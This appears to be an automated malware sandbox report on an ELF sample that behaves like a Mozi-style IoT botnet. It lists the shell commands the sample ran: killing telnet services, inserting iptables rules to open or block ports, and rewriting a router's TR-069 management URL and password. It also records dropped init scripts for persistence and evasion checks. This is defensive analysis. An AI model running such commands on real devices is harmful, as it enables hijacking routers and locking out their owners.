Source: /usr/bin/killall (PID: 4566)	File opened: /proc/385/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/144/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/386/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/145/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/146/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3546/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3546/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/147/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3303/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3545/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/148/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/149/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3543/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/822/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/822/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3308/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3308/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3429/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3429/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/47/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/48/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/48/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/49/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/150/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/271/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/151/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/152/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/153/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/395/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/396/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/154/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/155/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/156/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/1017/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/157/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/158/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/159/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3432/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/3432/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/50/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4566)	File opened: /proc/51/stat			Jump to behavior

Executes commands using a shell command-line interpreter

Source: /tmp/i (PID: 4564)	Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"			Jump to behavior
Source: /tmp/i (PID: 4605)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 57738 -j ACCEPT"			Jump to behavior
Source: /tmp/i (PID: 4658)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 57738 -j ACCEPT"			Jump to behavior
Source: /tmp/i (PID: 4666)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 57738 -j ACCEPT"			Jump to behavior
Source: /tmp/i (PID: 4708)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 57738 -j ACCEPT"			Jump to behavior
Source: /tmp/i (PID: 4711)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 57738 -j ACCEPT"			Jump to behavior
Source: /tmp/i (PID: 4723)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 57738 -j ACCEPT"			Jump to behavior
Source: /tmp/i (PID: 4752)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 57738 -j ACCEPT"			Jump to behavior
Source: /tmp/i (PID: 4783)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 57738 -j ACCEPT"			Jump to behavior
Source: /tmp/i (PID: 4857)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"			Jump to behavior
Source: /tmp/i (PID: 4869)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"			Jump to behavior
Source: /tmp/i (PID: 4892)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"			Jump to behavior
Source: /tmp/i (PID: 4899)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"			Jump to behavior
Source: /tmp/i (PID: 4929)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""			Jump to behavior
Source: /tmp/i (PID: 4935)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""			Jump to behavior
Source: /tmp/i (PID: 4937)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"			Jump to behavior
Source: /tmp/i (PID: 4949)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"			Jump to behavior
Source: /tmp/i (PID: 4980)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"			Jump to behavior
Source: /tmp/i (PID: 5009)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"			Jump to behavior
Source: /tmp/i (PID: 5018)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"			Jump to behavior
Source: /tmp/i (PID: 5047)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"			Jump to behavior
Source: /tmp/i (PID: 5052)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"			Jump to behavior
Source: /tmp/i (PID: 5084)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"			Jump to behavior
Source: /tmp/i (PID: 5097)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"			Jump to behavior
Source: /tmp/i (PID: 5118)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"			Jump to behavior
Source: /tmp/i (PID: 5130)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"			Jump to behavior
Source: /tmp/i (PID: 5159)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"			Jump to behavior
Source: /tmp/i (PID: 5181)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 28537 -j ACCEPT"			Jump to behavior
Source: /tmp/i (PID: 5184)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 28537 -j ACCEPT"			Jump to behavior
Source: /tmp/i (PID: 5213)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 28537 -j ACCEPT"			Jump to behavior
Source: /tmp/i (PID: 5235)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 28537 -j ACCEPT"			Jump to behavior
Source: /tmp/i (PID: 5241)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 28537 -j ACCEPT"			Jump to behavior
Source: /tmp/i (PID: 5244)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 28537 -j ACCEPT"			Jump to behavior
Source: /tmp/i (PID: 5268)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 28537 -j ACCEPT"			Jump to behavior
Source: /tmp/i (PID: 5308)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 28537 -j ACCEPT"			Jump to behavior

Executes the "iptables" command used for managing IP filtering and manipulation

Source: /bin/sh (PID: 4613)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4662)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4675)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4710)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4714)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4732)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4763)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4787)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4860)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4878)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4897)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4909)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4940)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4959)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4994)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5012)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5028)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5050)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5062)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5091)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5100)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5124)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5140)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5164)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5183)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5189)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5220)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5240)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5243)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5249)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5282)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5315)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28537 -j ACCEPT			Jump to behavior

Reads system information from the proc file system

Source: /tmp/i (PID: 4589)

Reads from proc file: /proc/stat

Jump to behavior

Sample tries to set the executable flag

Source: /tmp/i (PID: 4562)	File: /usr/networks (bits: - usr: rx grp: rx all: rwx)			Jump to behavior
Source: /tmp/i (PID: 4562)	File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)			Jump to behavior
Source: /tmp/i (PID: 4562)	File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)			Jump to behavior

Writes ELF files to disk

Source: /tmp/i (PID: 4562)

File written: /usr/networks

Jump to dropped file

Writes shell script files to disk

Source: /tmp/i (PID: 4562)	Shell script file created: /etc/rcS.d/S95baby.sh			Jump to dropped file
Source: /tmp/i (PID: 4562)	Shell script file created: /etc/init.d/S95baby.sh			Jump to dropped file

Samples exit code indicates no error despite standard error output

Source: submitted sample

Stderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705qemu: uncaught target signal 4 (Illegal instruction) - core dumpedUnsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

Hooking and other Techniques for Hiding and Protection:

Drops files in suspicious directories

Source: /tmp/i (PID: 4562)	File: /etc/init.d/S95baby.sh			Jump to dropped file
Source: /tmp/i (PID: 4562)	File: /etc/init.d/mountall.sh			Jump to dropped file
Source: /tmp/i (PID: 4562)	File: /etc/init.d/checkfs.sh			Jump to dropped file
Source: /tmp/i (PID: 4562)	File: /etc/init.d/umountnfs.sh			Jump to dropped file
Source: /tmp/i (PID: 4562)	File: /etc/init.d/mountkernfs.sh			Jump to dropped file
Source: /tmp/i (PID: 4562)	File: /etc/init.d/checkroot-bootclean.sh			Jump to dropped file
Source: /tmp/i (PID: 4562)	File: /etc/init.d/mountnfs-bootclean.sh			Jump to dropped file
Source: /tmp/i (PID: 4562)	File: /etc/init.d/bootmisc.sh			Jump to dropped file
Source: /tmp/i (PID: 4562)	File: /etc/init.d/checkroot.sh			Jump to dropped file
Source: /tmp/i (PID: 4562)	File: /etc/init.d/hwclock.sh			Jump to dropped file
Source: /tmp/i (PID: 4562)	File: /etc/init.d/hostname.sh			Jump to dropped file
Source: /tmp/i (PID: 4562)	File: /etc/init.d/mountdevsubfs.sh			Jump to dropped file
Source: /tmp/i (PID: 4562)	File: /etc/init.d/mountall-bootclean.sh			Jump to dropped file
Source: /tmp/i (PID: 4562)	File: /etc/init.d/mountnfs.sh			Jump to dropped file
Source: /tmp/i (PID: 4562)	File: /usr/bin/gettext.sh			Jump to dropped file
Source: /tmp/i (PID: 4562)	File: /usr/sbin/alsa-info.sh			Jump to dropped file

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52228 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 49152 -> 52228
Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44712 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 7574 -> 44712
Source: unknown	Network traffic detected: HTTP traffic on port 48440 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48440 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48440 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48440 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48440 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48440 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48440 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48440 -> 7574

Malware Analysis System Evasion:

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/i (PID: 4547)	Queries kernel information via 'uname':			Jump to behavior
Source: /tmp/i (PID: 4562)	Queries kernel information via 'uname':			Jump to behavior
Source: /tmp/i (PID: 4585)	Queries kernel information via 'uname':			Jump to behavior
Source: /sbin/modprobe (PID: 4621)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 4813)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 4832)	Queries kernel information via 'uname':			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: kvm-test-1-run.sh.6.dr	Binary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
Source: functions.sh0.6.dr	Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: kill -KILL $qemu_pid
Source: functions.sh0.6.dr	Binary or memory string: qemu-system-ppc64)
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: kvm.sh.6.dr	Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: qemu_pid=$!
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: functions.sh0.6.dr	Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-recheck-lock.sh.6.dr	Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: functions.sh0.6.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.6.dr	Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: functions.sh0.6.dr	Binary or memory string: identify_qemu_append () {
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: functions.sh0.6.dr	Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
Source: functions.sh0.6.dr	Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: kvm.sh.6.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
Source: functions.sh0.6.dr	Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: functions.sh0.6.dr	Binary or memory string: identify_qemu_args () {
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
Source: functions.sh0.6.dr	Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: # Generate -smp qemu argument.
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: functions.sh0.6.dr	Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: functions.sh0.6.dr	Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: kvm.sh.6.dr	Binary or memory string: --qemu-args|--qemu-arg)
Source: kvm.sh.6.dr	Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: functions.sh0.6.dr	Binary or memory string: echo $TORTURE_QEMU_CMD
Source: kvm.sh.6.dr	Binary or memory string: TORTURE_QEMU_MAC=$2
Source: kvm.sh.6.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
Source: functions.sh0.6.dr	Binary or memory string: specify_qemu_cpus () {
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: functions.sh0.6.dr	Binary or memory string: echo qemu-system-ppc64
Source: functions.sh0.6.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: kvm.sh.6.dr	Binary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
Source: functions.sh0.6.dr	Binary or memory string: qemu-system-ppc64)
Source: functions.sh0.6.dr	Binary or memory string: # identify_boot_image qemu-cmd
Source: kvm.sh.6.dr	Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: kvm-recheck-rcu.sh.6.dr	Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh0.6.dr	Binary or memory string: # identify_qemu_append qemu-cmd
Source: functions.sh0.6.dr	Binary or memory string: identify_qemu_vcpus () {
Source: functions.sh0.6.dr	Binary or memory string: # qemu-args already contains "-smp".
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: functions.sh0.6.dr	Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh0.6.dr	Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: functions.sh0.6.dr	Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: functions.sh0.6.dr	Binary or memory string: # identify_qemu_vcpus
Source: kvm.sh.6.dr	Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: functions.sh0.6.dr	Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: functions.sh0.6.dr	Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: functions.sh0.6.dr	Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: kvm.sh.6.dr	Binary or memory string: --qemu-cmd)
Source: kvm.sh.6.dr	Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: qemu_args=$5
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: # Generate qemu -append arguments
Source: functions.sh0.6.dr	Binary or memory string: # identify_qemu builddir
Source: functions.sh0.6.dr	Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: kvm-test-1-run.sh.6.dr	Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: functions.sh0.6.dr	Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: kvm.sh.6.dr	Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: functions.sh0.6.dr	Binary or memory string: echo qemu-system-i386
Source: functions.sh0.6.dr	Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: functions.sh0.6.dr	Binary or memory string: echo qemu-system-x86_64
Source: functions.sh0.6.dr	Binary or memory string: identify_qemu () {